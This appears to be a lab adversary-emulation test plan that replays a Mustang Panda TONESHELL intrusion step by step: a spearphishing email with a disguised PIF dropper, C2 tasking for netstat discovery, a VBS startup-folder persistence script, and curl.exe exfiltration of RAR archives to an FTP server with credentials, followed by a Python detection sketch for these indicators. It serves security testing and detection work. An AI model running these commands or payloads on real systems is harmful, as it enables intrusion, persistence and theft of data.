# Protections Test 4 Scenario

## Setup

### Procedures

☣️ Initiate an RDP session to the Kali attack host driftmark (174.3.0.70)

☣️ In a new terminal window, start the simple file server and TONESHELL handler if they are not already running:

```
cd /opt/kalidev/mustang_panda/controlServer/
sudo go build -o controlServer main.go
sudo ./controlServer -c config/protections.yml
```

Expected Output

```
...
[SUCCESS] 2024/04/01 10:10:11 Started handler simplefileserver
[SUCCESS] 2024/04/01 10:10:11 Started handler toneshell
[INFO] 2024/04/01 10:10:11 Waiting for connections
```

☣️ Initiate an RDP session to the jumpbox dreadfort (10.26.3.125)
## Step 1 - Initial Access

### Voice Track
Mustang Panda sends an email from dnaharis@pentos.com to btully@vale.net containing
a .zip file attachment. btully downloads and unzips the .zip file which
contains 2 subfolders. The first subfolder Appendix I contains a PIF file
Assessing Westeros-Essos Global Influence.pif, which is the TONESHELL dropper
executable masquerading as a PIF file, while the second subfolder Appendix II
contains a PDF file Assessing Westeros-Essos Global Influence (1).pdf.
When
btully opens the PIF file (executes the TONESHELL dropper), the TONESHELL dropper
checks for the presence of GFlagEditor in C:\ProgramData. If it does not
exist, the TONESHELL dropper will create the folder C:\ProgramData\GFlagEditor
and drop a legitimate binary gflags.exe and the TONESHELL loader gflagsui.dll
into it. The TONESHELL dropper then opens the decoy PDF and creates a scheduled
task to execute the legitimate binary.
### Procedures

From the jumpbox, initiate an RDP session to the workstation bitterbridge (10.26.4.103)

On the workstation bitterbridge (10.26.4.103), open Firefox and browse to the Outlook Web Access portal, logging in with btully's credentials

☣️ Switch to the Kali and open a new terminal to activate the Python virtual environment, then send the spearphishing email:

```
cd /opt/kalidev/
source venv/bin/activate
python3 /opt/kalidev/mustang_panda/Resources/email_generation/send_email.py mail.pentos.com /opt/kalidev/mustang_panda/Resources/payloads/p4_spearphishing.html -t btully@vale.net -f dnaharis@pentos.com -fn 'Daario Naharis' -s 'Westeros-Essos Cyber Summit Read-Ahead Preparation' -a /opt/kalidev/mustang_panda/Resources/payloads/protections4.zip -an 'Assessing Westeros-Essos Global Influence.zip'
```

Expected Output

```
Successfully sent email
```

Switch to the RDP to the workstation bitterbridge (10.26.4.103) and confirm receipt of the spearphishing email

Open the email and click to download the attachment Assessing Westeros-Essos Global Influence.zip

Open the Downloads folder, right-click the ZIP file Assessing Westeros-Essos Global Influence.zip, click "Extract All...", then click "Extract"

Navigate into the Appendix I directory and double-click to execute the PIF file Assessing Westeros-Essos Global Influence.pif, then click "Run". Wait until a CMD prompt flashes with GFlagEditor in the window name, then switch windows several times to bypass the sandbox check

☣️ Switch to Kali, then wait 5-8 minutes for C2 registration
### Reference Tables

## Step 2 - Discovery and Persistence

### Voice Track
After establishing C2, Mustang Panda discovers an active connection to the file server
redfort (10.26.3.105). Mustang Panda then downloads a VBS script to the startup
folder for persistent collection. When the legitimate user logs back in, the VBS
script executes several RAR commands to archive files on the file server.
### Procedures

☣️ Task TONESHELL to execute netstat to discover the file server 10.26.3.105 (redfort)

```
python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 70d6b5c1105063b81d9ce95866793488 '{"id": 5, "taskNum": 1, "args": "netstat -anop tcp"}'
```

Expected Output

```
[TASK] 2025/07/30 20:31:55
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       400
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1096
```

☣️ Task TONESHELL to download a file extension list used by the VBS collection script to the startup folder

```
python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 70d6b5c1105063b81d9ce95866793488 '{"id": 3, "taskNum": 2, "payload": "files.txt", "args": "C:\\Windows\\Help\\en-US\\0.txt"}'
```

Expected Output

```
File downloaded successfully
```

☣️ Task TONESHELL to download the VBS collection script to the startup folder

```
python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 70d6b5c1105063b81d9ce95866793488 '{"id": 3, "taskNum": 3, "payload": "collection.vbs", "args": "C:\\Users\\btully\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\autoruns.vbs"}'
```

Expected Output

```
File downloaded successfully
```

Switch to the RDP to the workstation bitterbridge (10.26.4.103) and log out

From the jumpbox, initiate an RDP session to log back in to the workstation bitterbridge (10.26.4.103). Wait until a CMD prompt appears with GFlagEditor in the window name, then open File Explorer to bypass the sandbox check.
### Reference Tables

## Step 3 - Exfiltration

### Voice Track
After archiving files, Mustang Panda executes curl.exe to exfiltrate the RAR files to
an adversary-controlled FTP server.
### Procedures

☣️ Task TONESHELL to use curl.exe and exfiltrate the RAR files

```
python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 70d6b5c1105063b81d9ce95866793488 '{"id": 5, "taskNum": 4, "args": "curl.exe -T \"{C:\\\\Windows\\\\Help\\\\Corporate\\\\67.rar,C:\\\\Windows\\\\Help\\\\Corporate\\\\69.rar,C:\\\\Windows\\\\Help\\\\Corporate\\\\70.rar,C:\\\\Windows\\\\Help\\\\Corporate\\\\71.rar,C:\\\\Windows\\\\Help\\\\Corporate\\\\72.rar}\" ftp://ftp_user:Gracious-Coat@49.67.12.21/4/ --ftp-create-dirs"}'
```

Expected Output

```
[TASK] 2025/07/31 16:13:43
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  714k    0     0  100  714k      0 1198k --:--:-- --:--:-- --:--:-- 1198k
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 42.1M    0     0  100 42.1M      0 85.1M --:--:-- --:--:-- --:--:-- 85.1M
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 84.3M    0     0  100 84.3M      0 89.8M --:--:-- --:--:-- --:--:-- 89.8M
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 42.1M    0     0  100 42.1M      0 69.4M --:--:-- --:--:-- --:--:-- 69.4M
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 84.3M    0     0  100 84.3M      0 86.6M --:--:-- --:--:-- --:--:-- 86.6M
```
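From the defender's side, the observable footprint of Steps 1 to 3 is compact: a scheduled task and a process running out of C:\ProgramData\GFlagEditor, a .vbs written into a user's Startup folder, and curl.exe uploading (-T) to an ftp:// destination. The Python sketch below is an added editorial example, not part of this emulation plan or its tooling: it encodes those indicators as rules and runs them over constructed sample telemetry. The flat event schema (dicts with a "kind" field), the sample records and the FTP host 203.0.113.10 are all constructed for illustration and would need mapping onto real Sysmon or EDR fields.

```python
"""Detection sketch for the TONESHELL activity chain in this scenario.

Added editorial example, not part of the emulation plan or its tooling.
The event schema below is constructed for illustration (flat dicts with a
"kind" field), not real Sysmon/EDR field names; map it onto your own telemetry.
"""
import re
import shlex

# Indicators lifted from the scenario: the DLL side-load staging folder, the
# per-user Startup folder that receives the VBS, and curl uploads to FTP.
STAGING_DIR = r"c:\programdata\gflageditor" + "\\"
STARTUP_VBS_RE = re.compile(
    r"\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\[^\\]+\.vbs$",
    re.IGNORECASE,
)
FTP_URL_RE = re.compile(r"^ftps?://", re.IGNORECASE)

# Constructed sample telemetry. Records 1, 2, 3 and 5 mirror the scenario; the
# rest are benign filler. The FTP host is a documentation-range placeholder.
SAMPLE_EVENTS = [
    {"kind": "process", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"kind": "task_created", "action": r"C:\ProgramData\GFlagEditor\gflags.exe"},
    {"kind": "process", "image": r"C:\ProgramData\GFlagEditor\gflags.exe",
     "cmdline": "gflags.exe"},
    {"kind": "file_created",
     "path": r"C:\Users\btully\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autoruns.vbs"},
    {"kind": "file_created",
     "path": r"C:\Users\btully\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini"},
    {"kind": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl.exe -T "{C:\Windows\Help\Corporate\67.rar,C:\Windows\Help\Corporate\69.rar}" '
                r"ftp://ftp_user:PLACEHOLDER@203.0.113.10/4/ --ftp-create-dirs"},
    {"kind": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -s https://example.com/"},
]


def _tokens(cmdline: str) -> list:
    """Split a Windows command line on whitespace, honouring double quotes.

    posix=False keeps backslashes literal; the surrounding quotes are then stripped.
    """
    try:
        return [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:  # unbalanced quotes: fall back to a plain split
        return cmdline.split()


def rule_execution_from_staging_dir(evt: dict) -> bool:
    """A process image running out of the GFlagEditor folder under ProgramData."""
    return evt["kind"] == "process" and evt.get("image", "").lower().startswith(STAGING_DIR)


def rule_task_runs_staged_binary(evt: dict) -> bool:
    """A scheduled task whose action points into the staging folder."""
    return evt["kind"] == "task_created" and evt.get("action", "").lower().startswith(STAGING_DIR)


def rule_vbs_in_startup(evt: dict) -> bool:
    """A .vbs written to a user's Startup folder (executes at next logon)."""
    return evt["kind"] == "file_created" and STARTUP_VBS_RE.search(evt.get("path", "")) is not None


def rule_curl_ftp_upload(evt: dict) -> bool:
    """curl.exe uploading (-T / --upload-file) to an ftp:// or ftps:// URL."""
    if evt["kind"] != "process" or not evt.get("image", "").lower().endswith("\\curl.exe"):
        return False
    args = _tokens(evt.get("cmdline", ""))
    uploads = "-T" in args or "--upload-file" in args
    return uploads and any(FTP_URL_RE.match(a) for a in args)


RULES = {
    "scheduled_task_runs_staged_binary": rule_task_runs_staged_binary,
    "execution_from_gflageditor_staging_dir": rule_execution_from_staging_dir,
    "vbs_dropped_in_startup_folder": rule_vbs_in_startup,
    "curl_ftp_upload": rule_curl_ftp_upload,
}


def detect(events) -> list:
    """Return (event_index, rule_name) for every rule that fires, in event order."""
    return [(i, name) for i, evt in enumerate(events)
            for name, rule in RULES.items() if rule(evt)]


if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The netstat task from Step 2 is deliberately not a rule: `netstat -anop tcp` is routine administrator activity, and on its own it is only useful as context once one of the higher-fidelity rules above has fired on the same host.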
### Reference Tables

## End of Test

### Voice Track

This step includes the shutdown procedures for the end of this Protections Test.

### Procedures

- Return to the RDP to bitterbridge (10.26.4.103). Close all windows and sign out.